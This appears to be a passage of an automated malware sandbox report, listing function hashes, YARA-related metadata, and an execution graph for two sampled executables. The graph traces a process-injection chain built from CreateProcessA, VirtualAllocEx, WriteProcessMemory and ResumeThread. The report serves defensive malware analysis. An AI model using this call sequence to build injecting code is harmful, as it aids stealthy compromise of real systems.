                                                                        • Opcode Fuzzy Hash: 95aef7e473bcb8d5c2e60654e63ccd9093d51ee425080bce8c6fe0ccd23f0c2f
                                                                        • Instruction Fuzzy Hash: 4E2168B1D002099FDB14DFA9D844BEEBBF6EB98320F108419E515A7250C7749A44CFA0
                                                                        Function 018F6410 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 018F648B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3827130260.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_18f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HookWindows
                                                                        • String ID:
                                                                        • API String ID: 2559412058-0
                                                                        • Opcode ID: 6f26852fe24bb74c15a8eb076296138c42a41c34d9ef7947d8284aaa20b5bb6f
                                                                        • Instruction ID: c38917ae29acff141ce7c1e6ec0154256acdd7156da3aff3c326ee39ee48eb5c
                                                                        • Opcode Fuzzy Hash: 6f26852fe24bb74c15a8eb076296138c42a41c34d9ef7947d8284aaa20b5bb6f
                                                                        • Instruction Fuzzy Hash: D62147B1D002099FDB14DFAAC844BEEFBF5EF88320F108419D515A7250D775AA44CFA1
                                                                        Function 0164D528 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3826444036.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_164d000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 839e93c8f49b88c1249298dd9871ee1a6355d9d4f408e8052dde95dc40e0fad4
                                                                        • Instruction ID: 4a432c380c9c6eef37c56dece0d1407e7a10da55bcc2c6be449de088979b155d
                                                                        • Opcode Fuzzy Hash: 839e93c8f49b88c1249298dd9871ee1a6355d9d4f408e8052dde95dc40e0fad4
                                                                        • Instruction Fuzzy Hash: 5F2125B1904240DFDB0ADF98DDC0B26BF65FBA8318F24C56DE90A4B246C736D456C6E1
                                                                        Function 0165D2B4 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3826650460.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_165d000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 53685c52e1fad464a7204f4291be67112c9587fc7e5a847ca90a249820b166eb
                                                                        • Instruction ID: 5a1ed918ca205976429a32b117aef1f745bc2df90cc9eb566ae7753ac0ab0f82
                                                                        • Opcode Fuzzy Hash: 53685c52e1fad464a7204f4291be67112c9587fc7e5a847ca90a249820b166eb
                                                                        • Instruction Fuzzy Hash: 1D2126B1504204EFDB45DF98D9C0B26BBA5FB89314F24C96DED494B393C33AD846CA61
                                                                        Function 0165D0EC Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3826650460.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_165d000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a53dc504e005d640df35f7dae513584d610d883a2ed9b1b392329f122f92155
                                                                        • Instruction ID: 151ee17073a862d95ec5a5508445b2d565c9f704f53d9950d23cd3b11f13a8de
                                                                        • Opcode Fuzzy Hash: 7a53dc504e005d640df35f7dae513584d610d883a2ed9b1b392329f122f92155
                                                                        • Instruction Fuzzy Hash: CA21F2B1504200EFDB65DF98DD80B26BBA5FB88315F24C96DED0A4B396C336D406CAA1
                                                                        Function 0165D1D4 Relevance: .1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3826650460.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_165d000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 20c65a71d24ee5e1d307b34b0bcd896b0dfe085a49eeaa00137fc8a4bfe33c00
                                                                        • Instruction ID: 6f80ff154cfcb141b747049e2ea2e0de950591cf1be98ccd2d42ff06b6b9b94e
                                                                        • Opcode Fuzzy Hash: 20c65a71d24ee5e1d307b34b0bcd896b0dfe085a49eeaa00137fc8a4bfe33c00
                                                                        • Instruction Fuzzy Hash: 9F21F2B1504200DFDB55DF98D9C0B26BFA5FB88364F24C66DEE0A4B396C336D446C661
                                                                        Function 0164D523 Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3826444036.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_164d000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                        • Instruction ID: 745878915b9fa6d4355c5094b40cb19a97eb0252290bfb72c5b22e2937ff2dc4
                                                                        • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                        • Instruction Fuzzy Hash: 1511EE72804280CFDB16CF44D9C0B16BF72FB94324F24C6A9D9094B256C33AD45ACBA2
                                                                        Function 0165D0E7 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3826650460.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_165d000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                        • Instruction ID: 7d245124f42aad05ffa7ddb4d8a84fcd5ae7d043c7a5d269b49ab922aa454e5b
                                                                        • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                        • Instruction Fuzzy Hash: C011BB75504280DFDB12CF54D9C4B15BBA2FB84214F24C6A9DC094B796C33AD40ACBA1
                                                                        Function 0165D2AF Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3826650460.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_165d000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                        • Instruction ID: b486c4e9318a2d9d3b190e00718c884373a66a986cdbd58fb6fa5247e0e849d8
                                                                        • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                        • Instruction Fuzzy Hash: F111BB75504680CFDB02CF54D9C0B19BBA1FB85214F28C6A9DC494B393C33AD40ACBA1
                                                                        Function 0165D1CF Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.3826650460.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_165d000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4e08d273bc19f3b3ab6564e8c8f805518653f541784c48cdb785afd743e373b6
                                                                        • Instruction ID: 9f4f4d66f082a16808379e8b19162a9abf8a3ee8147f002c97e7149f0af4e81c
                                                                        • Opcode Fuzzy Hash: 4e08d273bc19f3b3ab6564e8c8f805518653f541784c48cdb785afd743e373b6
                                                                        • Instruction Fuzzy Hash: 1D11DD75504280CFDB12CF54C9C4B15BFA1FB84228F24C6ADDD094B796C33AD44ACB51

                                                                        Execution Graph

                                                                        Execution Coverage:10.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:324
                                                                        Total number of Limit Nodes:9
                                                                        execution_graph 43754 1094668 43755 109467a 43754->43755 43756 1094686 43755->43756 43760 1094779 43755->43760 43765 1093e34 43756->43765 43758 10946a5 43761 109479d 43760->43761 43769 1094879 43761->43769 43773 1094888 43761->43773 43766 1093e3f 43765->43766 43781 1095c44 43766->43781 43768 1097018 43768->43758 43771 1094888 43769->43771 43770 109498c 43770->43770 43771->43770 43777 10944b4 43771->43777 43775 10948af 43773->43775 43774 109498c 43775->43774 43776 10944b4 CreateActCtxA 43775->43776 43776->43774 43778 1095918 CreateActCtxA 43777->43778 43780 10959db 43778->43780 43782 1095c4f 43781->43782 43785 1095c64 43782->43785 43784 10970bd 43784->43768 43786 1095c6f 43785->43786 43789 1095c94 43786->43789 43788 109719a 43788->43784 43790 1095c9f 43789->43790 43793 1095cc4 43790->43793 43792 109728d 43792->43788 43794 1095ccf 43793->43794 43796 109858b 43794->43796 43800 109ac3a 43794->43800 43795 10985c9 43795->43792 43796->43795 43804 109cd29 43796->43804 43809 109cd38 43796->43809 43814 109ac5f 43800->43814 43819 109ac70 43800->43819 43801 109ac4e 43801->43796 43805 109cd59 43804->43805 43806 109cd7d 43805->43806 43833 109cee8 43805->43833 43837 109ced8 43805->43837 43806->43795 43810 109cd59 43809->43810 43811 109cd7d 43810->43811 43812 109ced8 4 API calls 43810->43812 43813 109cee8 4 API calls 43810->43813 43811->43795 43812->43811 43813->43811 43815 109ac70 43814->43815 43823 109ad58 43815->43823 43828 109ad68 43815->43828 43816 109ac7f 43816->43801 43821 109ad58 GetModuleHandleW 43819->43821 43822 109ad68 GetModuleHandleW 43819->43822 43820 109ac7f 43820->43801 43821->43820 43822->43820 43824 109ad79 43823->43824 43825 109ad9c 43823->43825 43824->43825 43826 109afa0 GetModuleHandleW 43824->43826 43825->43816 43827 109afcd 43826->43827 43827->43816 43829 109ad79 43828->43829 43830 109ad9c 43828->43830 43829->43830 43831 109afa0 GetModuleHandleW 43829->43831 43830->43816 43832 109afcd 43831->43832 43832->43816 43835 109cef5 43833->43835 43834 109cf2f 43834->43806 43835->43834 43841 109baa0 43835->43841 43838 109cef5 43837->43838 43839 109cf2f 43838->43839 43840 109baa0 4 API calls 43838->43840 43839->43806 43840->43839 43842 109baa5 43841->43842 43844 109dc48 43842->43844 43845 109d29c 43842->43845 43844->43844 43846 109d2a7 43845->43846 43847 1095cc4 4 API calls 43846->43847 43848 109dcb7 43847->43848 43852 109fa30 43848->43852 43857 109fa48 43848->43857 43849 109dcf1 43849->43844 43853 109fa48 43852->43853 43854 109fa85 43853->43854 43855 51709b0 CreateWindowExW CreateWindowExW 43853->43855 43856 51709c0 CreateWindowExW CreateWindowExW 43853->43856 43854->43849 43855->43854 43856->43854 43859 109fa79 43857->43859 43860 109fb79 43857->43860 43858 109fa85 43858->43849 43859->43858 43861 51709b0 CreateWindowExW CreateWindowExW 43859->43861 43862 51709c0 CreateWindowExW CreateWindowExW 43859->43862 43860->43849 43861->43860 43862->43860 43507 81b15d9 43508 81b158c 43507->43508 43509 81b15c9 43508->43509 43513 81b32ce 43508->43513 43530 81b3260 43508->43530 43546 81b3270 43508->43546 43509->43509 43514 81b325c 43513->43514 43515 81b32d1 43513->43515 43525 81b32ae 43514->43525 43562 81b4111 43514->43562 43566 81b3952 43514->43566 43570 81b3a1d 43514->43570 43574 81b37be 43514->43574 43579 81b3ddf 43514->43579 43584 81b3b00 43514->43584 43588 81b3ac0 43514->43588 43593 81b3cce 43514->43593 43598 81b36e8 43514->43598 43603 81b3f8a 43514->43603 43607 81b3c4b 43514->43607 43612 81b37d1 43514->43612 43617 81b38b1 43514->43617 43515->43508 43525->43508 43531 81b328a 43530->43531 43532 81b3ddf 2 API calls 43531->43532 43533 81b37be 2 API calls 43531->43533 43534 81b3a1d 2 API calls 43531->43534 43535 81b3952 2 API calls 43531->43535 43536 81b4111 2 API calls 43531->43536 43537 81b38b1 2 API calls 43531->43537 43538 81b37d1 2 API calls 43531->43538 43539 81b3c4b 2 API calls 43531->43539 43540 81b3f8a 2 API calls 43531->43540 43541 81b32ae 43531->43541 43542 81b36e8 2 API calls 43531->43542 43543 81b3cce 2 API calls 43531->43543 43544 81b3ac0 2 API calls 43531->43544 43545 81b3b00 2 API calls 43531->43545 43532->43541 43533->43541 43534->43541 43535->43541 43536->43541 43537->43541 43538->43541 43539->43541 43540->43541 43541->43508 43542->43541 43543->43541 43544->43541 43545->43541 43547 81b328a 43546->43547 43548 81b3ddf 2 API calls 43547->43548 43549 81b37be 2 API calls 43547->43549 43550 81b3a1d 2 API calls 43547->43550 43551 81b3952 2 API calls 43547->43551 43552 81b4111 2 API calls 43547->43552 43553 81b38b1 2 API calls 43547->43553 43554 81b37d1 2 API calls 43547->43554 43555 81b3c4b 2 API calls 43547->43555 43556 81b3f8a 2 API calls 43547->43556 43557 81b32ae 43547->43557 43558 81b36e8 2 API calls 43547->43558 43559 81b3cce 2 API calls 43547->43559 43560 81b3ac0 2 API calls 43547->43560 43561 81b3b00 2 API calls 43547->43561 43548->43557 43549->43557 43550->43557 43551->43557 43552->43557 43553->43557 43554->43557 43555->43557 43556->43557 43557->43508 43558->43557 43559->43557 43560->43557 43561->43557 43621 81b0d49 43562->43621 43625 81b0d50 43562->43625 43563 81b412b 43629 81b0ee8 43566->43629 43633 81b0ee0 43566->43633 43567 81b3979 43572 81b0ee8 WriteProcessMemory 43570->43572 43573 81b0ee0 WriteProcessMemory 43570->43573 43571 81b3a4e 43572->43571 43573->43571 43575 81b37cb 43574->43575 43577 81b0ee8 WriteProcessMemory 43575->43577 43578 81b0ee0 WriteProcessMemory 43575->43578 43576 81b37a6 43576->43525 43577->43576 43578->43576 43580 81b3c52 43579->43580 43581 81b3aae 43580->43581 43637 81b0c99 43580->43637 43641 81b0ca0 43580->43641 43581->43525 43585 81b387d 43584->43585 43645 81b0fd8 43584->43645 43649 81b0fd0 43584->43649 43585->43525 43589 81b3ac6 43588->43589 43591 81b0fd8 ReadProcessMemory 43589->43591 43592 81b0fd0 ReadProcessMemory 43589->43592 43590 81b387d 43590->43525 43591->43590 43592->43590 43594 81b3c69 43593->43594 43595 81b3aae 43593->43595 43596 81b0c99 ResumeThread 43594->43596 43597 81b0ca0 ResumeThread 43594->43597 43595->43525 43596->43595 43597->43595 43599 81b36f3 43598->43599 43653 81b1170 43599->43653 43657 81b1164 43599->43657 43661 81b0e28 43603->43661 43665 81b0e21 43603->43665 43604 81b3fa8 43608 81b3c51 43607->43608 43610 81b0c99 ResumeThread 43608->43610 43611 81b0ca0 ResumeThread 43608->43611 43609 81b3aae 43609->43525 43610->43609 43611->43609 43613 81b37de 43612->43613 43615 81b0fd8 ReadProcessMemory 43613->43615 43616 81b0fd0 ReadProcessMemory 43613->43616 43614 81b387d 43614->43525 43615->43614 43616->43614 43619 81b0d49 Wow64SetThreadContext 43617->43619 43620 81b0d50 Wow64SetThreadContext 43617->43620 43618 81b38cb 43618->43525 43619->43618 43620->43618 43622 81b0d95 Wow64SetThreadContext 43621->43622 43624 81b0ddd 43622->43624 43624->43563 43626 81b0d95 Wow64SetThreadContext 43625->43626 43628 81b0ddd 43626->43628 43628->43563 43630 81b0f30 WriteProcessMemory 43629->43630 43632 81b0f87 43630->43632 43632->43567 43634 81b0f30 WriteProcessMemory 43633->43634 43636 81b0f87 43634->43636 43636->43567 43638 81b0ce0 ResumeThread 43637->43638 43640 81b0d11 43638->43640 43640->43581 43642 81b0ce0 ResumeThread 43641->43642 43644 81b0d11 43642->43644 43644->43581 43646 81b1023 ReadProcessMemory 43645->43646 43648 81b1067 43646->43648 43648->43585 43650 81b1023 ReadProcessMemory 43649->43650 43652 81b1067 43650->43652 43652->43585 43654 81b11f9 43653->43654 43654->43654 43655 81b135e CreateProcessA 43654->43655 43656 81b13bb 43655->43656 43656->43656 43658 81b11f9 43657->43658 43658->43658 43659 81b135e CreateProcessA 43658->43659 43660 81b13bb 43659->43660 43660->43660 43662 81b0e68 VirtualAllocEx 43661->43662 43664 81b0ea5 43662->43664 43664->43604 43666 81b0e68 VirtualAllocEx 43665->43666 43668 81b0ea5 43666->43668 43668->43604 43739 81b1649 43740 81b158c 43739->43740 43741 81b15c9 43740->43741 43742 81b32ce 12 API calls 43740->43742 43743 81b3270 12 API calls 43740->43743 43744 81b3260 12 API calls 43740->43744 43742->43740 43743->43740 43744->43740 43863 517a1b0 43864 517a1c0 43863->43864 43867 5179ca8 43864->43867 43866 517a1cf 43868 5179cb3 43867->43868 43869 517a202 43868->43869 43871 1095cc4 4 API calls 43868->43871 43872 10982ca 43868->43872 43869->43866 43871->43869 43873 10982d3 43872->43873 43875 109858b 43873->43875 43878 109ac3a 2 API calls 43873->43878 43874 10985c9 43874->43869 43875->43874 43876 109cd29 4 API calls 43875->43876 43877 109cd38 4 API calls 43875->43877 43876->43874 43877->43874 43878->43875 43669 109d000 43670 109d046 43669->43670 43674 109d5d9 43670->43674 43677 109d5e8 43670->43677 43671 109d133 43680 109d23c 43674->43680 43678 109d616 43677->43678 43679 109d23c DuplicateHandle 43677->43679 43678->43671 43679->43678 43681 109d650 DuplicateHandle 43680->43681 43682 109d616 43681->43682 43682->43671 43879 81b18a2 43880 81b158c 43879->43880 43881 81b15c9 43880->43881 43882 81b32ce 12 API calls 43880->43882 43883 81b3270 12 API calls 43880->43883 43884 81b3260 12 API calls 43880->43884 43881->43881 43882->43880 43883->43880 43884->43880 43745 81b4580 43746 81b470b 43745->43746 43747 81b45a6 43745->43747 43747->43746 43750 81b47f8 PostMessageW 43747->43750 43752 81b4800 PostMessageW 43747->43752 43751 81b486c 43750->43751 43751->43747 43753 81b486c 43752->43753 43753->43747 43683 d2d01c 43684 d2d034 43683->43684 43685 d2d08e 43684->43685 43690 5171a97 43684->43690 43695 5171aa8 43684->43695 43700 5172818 43684->43700 43705 5172809 43684->43705 43691 5171aa8 43690->43691 43693 5172809 2 API calls 43691->43693 43694 5172818 2 API calls 43691->43694 43692 5171aef 43692->43685 43693->43692 43694->43692 43696 5171ace 43695->43696 43698 5172809 2 API calls 43696->43698 43699 5172818 2 API calls 43696->43699 43697 5171aef 43697->43685 43698->43697 43699->43697 43701 5172845 43700->43701 43702 5172877 43701->43702 43710 5172990 43701->43710 43715 51729a0 43701->43715 43706 5172845 43705->43706 43707 5172877 43706->43707 43708 5172990 2 API calls 43706->43708 43709 51729a0 2 API calls 43706->43709 43708->43707 43709->43707 43712 51729a0 43710->43712 43711 5172a40 43711->43702 43720 5172a47 43712->43720 43724 5172a58 43712->43724 43717 51729b4 43715->43717 43716 5172a40 43716->43702 43718 5172a47 2 API calls 43717->43718 43719 5172a58 2 API calls 43717->43719 43718->43716 43719->43716 43721 5172a58 43720->43721 43722 5172a69 43721->43722 43727 5174012 43721->43727 43722->43711 43725 5172a69 43724->43725 43726 5174012 2 API calls 43724->43726 43725->43711 43726->43725 43731 5174030 43727->43731 43735 5174040 43727->43735 43728 517402a 43728->43722 43732 5174040 43731->43732 43733 51740da CallWindowProcW 43732->43733 43734 5174089 43732->43734 43733->43734 43734->43728 43736 5174082 43735->43736 43738 5174089 43735->43738 43737 51740da CallWindowProcW 43736->43737 43736->43738 43737->43738 43738->43728 43885 5176fe8 43886 5177015 43885->43886 43903 51765e8 43886->43903 43888 517709b 43908 51765f8 43888->43908 43890 51770cd 43891 51765f8 4 API calls 43890->43891 43892 5177131 43891->43892 43913 5176ccc 43892->43913 43895 5176ccc 4 API calls 43896 51771c7 43895->43896 43897 51765f8 4 API calls 43896->43897 43898 51771f9 43897->43898 43899 51765f8 4 API calls 43898->43899 43900 517722b 43899->43900 43901 51765f8 4 API calls 43900->43901 43902 517725d 43901->43902 43904 51765ee 43903->43904 43905 5178a58 43904->43905 43906 10982ca 4 API calls 43904->43906 43907 1095cc4 4 API calls 43904->43907 43905->43888 43906->43905 43907->43905 43909 5176603 43908->43909 43911 10982ca 4 API calls 43909->43911 43912 1095cc4 4 API calls 43909->43912 43910 5178c6b 43910->43890 43911->43910 43912->43910 43914 5176cd7 43913->43914 43915 5179ca8 4 API calls 43914->43915 43916 5177195 43915->43916 43916->43895

                                                                        Executed Functions

                                                                        Function 08200040 Relevance: 15.6, Strings: 10, Instructions: 3134COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (otq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4|yq$4|yq$$tq
                                                                        • API String ID: 0-1537292367
                                                                        • Opcode ID: b93d8b811b8acd146de85d2c33715f0620b62ad509ce60e22003a5769f1d5637
                                                                        • Instruction ID: 237f6e4ca5bb0728339cec6796f53e53e08c2ac7f58d36db62d48922c2b71289
                                                                        • Opcode Fuzzy Hash: b93d8b811b8acd146de85d2c33715f0620b62ad509ce60e22003a5769f1d5637
                                                                        • Instruction Fuzzy Hash: 6C631D74A14619CFCB29DF68C888A9DB7B2FF49311F158599D419AB3A2CB30ED81CF50
                                                                        Function 082034B8 Relevance: 5.6, Strings: 4, Instructions: 562COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1232 82034b8-82034e0 1233 82034e2 1232->1233 1234 82034e7-82035a3 1232->1234 1233->1234 1237 82035a5-82035a6 1234->1237 1238 82035a8-82035b5 1234->1238 1239 82035c7-82035cb 1237->1239 1238->1237 1238->1239 1240 82035d1-82035fb 1239->1240 1241 8203abb-8203afd 1239->1241 1244 8203601-8203619 1240->1244 1245 8203cc8-8203cd4 1240->1245 1250 8203b00-8203b04 1241->1250 1247 8203cda-8203ce3 1244->1247 1248 820361f-8203620 1244->1248 1245->1247 1251 8203ce9-8203cf5 1247->1251 1249 8203cae-8203cba 1248->1249 1254 8203cc0-8203cc7 1249->1254 1255 8203625-8203631 1249->1255 1252 82036d6-82036da 1250->1252 1253 8203b0a-8203b10 1250->1253 1264 8203cfb-8203d07 1251->1264 1256 82036ec-82036f2 1252->1256 1257 82036dc-82036ea 1252->1257 1253->1241 1260 8203b12-8203b6d 1253->1260 1258 8203633 1255->1258 1259 8203638-8203653 1255->1259 1262 8203737-820373b 1256->1262 1261 820374a-820377c 1257->1261 1258->1259 1259->1251 1263 8203659-820367e 1259->1263 1279 8203ba4-8203bce 1260->1279 1280 8203b6f-8203ba2 1260->1280 1285 82037a6 1261->1285 1286 820377e-820378a 1261->1286 1265 82036f4-8203700 1262->1265 1266 820373d 1262->1266 1263->1264 1277 8203684-8203686 1263->1277 1272 8203d0d-8203d14 1264->1272 1269 8203702 1265->1269 1270 8203707-820370f 1265->1270 1273 8203740-8203744 1266->1273 1269->1270 1275 8203711-8203725 1270->1275 1276 8203734 1270->1276 1273->1261 1278 82036bc-82036d3 1273->1278 1282 8203689-8203694 1275->1282 1283 820372b-8203732 1275->1283 1276->1262 1277->1282 1278->1252 1293 8203bd7-8203c56 1279->1293 1280->1293 1282->1272 1287 820369a-82036b7 1282->1287 1283->1266 1292 82037ac-82037d9 1285->1292 1289 8203794-820379a 1286->1289 1290 820378c-8203792 1286->1290 1287->1273 1294 82037a4 1289->1294 1290->1294 1299 8203828-82038bb 1292->1299 1300 82037db-8203813 1292->1300 1307 8203c5d-8203c70 1293->1307 1294->1292 1315 82038c4-82038c5 1299->1315 1316 82038bd 1299->1316 1308 8203c7f-8203c84 1300->1308 1307->1308 1309 8203c86-8203c94 1308->1309 1310 8203c9b-8203cab 1308->1310 1309->1310 1310->1249 1317 8203916-820391c 1315->1317 1316->1315 1318 82038c7-82038e6 1317->1318 1319 820391e-82039e0 1317->1319 1320 82038e8 1318->1320 1321 82038ed-8203913 1318->1321 1330 8203a21-8203a25 1319->1330 1331 82039e2-8203a1b 1319->1331 1320->1321 1321->1317 1332 8203a66-8203a6a 1330->1332 1333 8203a27-8203a60 1330->1333 1331->1330 1334 8203aab-8203aaf 1332->1334 1335 8203a6c-8203aa5 1332->1335 1333->1332 1334->1260 1337 8203ab1-8203ab9 1334->1337 1335->1334 1337->1250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'tq$:$pxq$~
                                                                        • API String ID: 0-2366959149
                                                                        • Opcode ID: ddef6a345ff2d3886b16c616b0fd74b9ede5124839d4a059af49769bc78d34c4
                                                                        • Instruction ID: 47406c7c2a934215ac01677dec5494a2168b19ce465ac1bf790bbe0713f53763
                                                                        • Opcode Fuzzy Hash: ddef6a345ff2d3886b16c616b0fd74b9ede5124839d4a059af49769bc78d34c4
                                                                        • Instruction Fuzzy Hash: 6442C375A10218DFDB19CFA9C984B99BBB2FF48304F1580E9E509AB362DB319D91DF10
                                                                        Function 081B1164 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1412 81b1164-81b1205 1414 81b123e-81b125e 1412->1414 1415 81b1207-81b1211 1412->1415 1420 81b1260-81b126a 1414->1420 1421 81b1297-81b12c6 1414->1421 1415->1414 1416 81b1213-81b1215 1415->1416 1418 81b1238-81b123b 1416->1418 1419 81b1217-81b1221 1416->1419 1418->1414 1422 81b1223 1419->1422 1423 81b1225-81b1234 1419->1423 1420->1421 1424 81b126c-81b126e 1420->1424 1431 81b12c8-81b12d2 1421->1431 1432 81b12ff-81b13b9 CreateProcessA 1421->1432 1422->1423 1423->1423 1425 81b1236 1423->1425 1426 81b1291-81b1294 1424->1426 1427 81b1270-81b127a 1424->1427 1425->1418 1426->1421 1429 81b127e-81b128d 1427->1429 1430 81b127c 1427->1430 1429->1429 1433 81b128f 1429->1433 1430->1429 1431->1432 1434 81b12d4-81b12d6 1431->1434 1443 81b13bb-81b13c1 1432->1443 1444 81b13c2-81b1448 1432->1444 1433->1426 1436 81b12f9-81b12fc 1434->1436 1437 81b12d8-81b12e2 1434->1437 1436->1432 1438 81b12e6-81b12f5 1437->1438 1439 81b12e4 1437->1439 1438->1438 1440 81b12f7 1438->1440 1439->1438 1440->1436 1443->1444 1454 81b144a-81b144e 1444->1454 1455 81b1458-81b145c 1444->1455 1454->1455 1458 81b1450 1454->1458 1456 81b145e-81b1462 1455->1456 1457 81b146c-81b1470 1455->1457 1456->1457 1459 81b1464 1456->1459 1460 81b1472-81b1476 1457->1460 1461 81b1480-81b1484 1457->1461 1458->1455 1459->1457 1460->1461 1462 81b1478 1460->1462 1463 81b1496-81b149d 1461->1463 1464 81b1486-81b148c 1461->1464 1462->1461 1465 81b149f-81b14ae 1463->1465 1466 81b14b4 1463->1466 1464->1463 1465->1466 1467 81b14b5 1466->1467 1467->1467
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 081B13A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752670503.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_81b0000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 9db2fae8195316e139a12f7dd8e36ce49390ab29c3f7daf89b8b41bffe00bed8
                                                                        • Instruction ID: f41aeaff6a00444faad0a5b92530ffeb97e22711d3adcede214608dfcb3be369
                                                                        • Opcode Fuzzy Hash: 9db2fae8195316e139a12f7dd8e36ce49390ab29c3f7daf89b8b41bffe00bed8
                                                                        • Instruction Fuzzy Hash: 9BA19C71D00259DFDF24CFA8C851BEDBBB2BF48311F1585A9E808A7240EB759985CFA1
                                                                        Function 081B1170 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
